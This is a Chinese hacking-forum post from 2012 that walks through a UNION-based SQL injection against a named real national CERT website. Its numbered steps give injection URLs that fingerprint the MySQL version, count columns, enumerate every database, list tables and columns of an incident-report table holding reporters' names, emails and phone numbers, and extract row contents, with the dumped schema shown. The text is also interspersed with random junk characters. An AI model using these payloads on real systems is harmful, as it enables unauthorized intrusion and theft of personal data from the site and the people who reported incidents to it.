找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1799|回复: 0
打印 上一主题 下一主题

.高级暴库方法讲解

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:57:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
/ {6 I9 T: R+ B% `2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
7 X) v/ y" V3 |) bhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--, A! E! K* W, o; b/ a
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--* Z; s: }) g. t" F9 `7 Z+ i( K
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。) ?" C* D/ k1 x" M) L; J1 Y: Y9 v# ~
4.判断有没有写权限
$ [+ Q8 m! k4 z& R3 v" Phttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限  V9 c, K9 B; T  i% z
没办法,手动猜表啦6 f( ~# A0 S* w
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,18 M, y; F# Z2 z2 z. Z% S
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下! r( i, t' g9 w# a
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--& t& ^* D5 d% i+ r
成功查出所有数据库,国外的黑客就是不一般。数据库如下:& Q" O1 X' L5 B* p$ y
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb9 r& R8 N: w3 ]9 ~  J+ F
6.爆表,爆的是twcert库
8 a2 c6 U" L. X  b* q# ?9 B! P% Mhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
8 ?: c: y, R" d爆出如下表$ j! v6 {1 d+ B! n- D6 E0 o8 W' @6 i- Q
downloadfile,irsys,newsdata,secrpt,secrpt_big5
# K2 J; f& X, e) k1 X7.爆列名,这次爆的是irsys表( X% s) A: c  i2 p5 P  m
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--# X4 O1 {: q2 k. M: f9 j- M
爆出如下列$ s2 E1 e: T8 e  Q( L: R
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
& I  {  e, |* D9 [% i8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
+ A; S) ^9 n7 r1 N, V) `1 c: @" `http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
; @* ]- T8 K$ D7 P/ o( b返回是3,说明每个列里有3个地段
% G7 L8 Z" t- O, f* \# G5 m3 W9.爆字段内容9 I& w6 v+ m* |% x
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--! O% u/ k( }- ^5 `* d0 i
爆出name列的第一个字段的内容
$ W5 A1 G+ P: a; [http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
/ @8 F& k6 l4 `2 F2 S爆出name列的第二个字段的内容
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表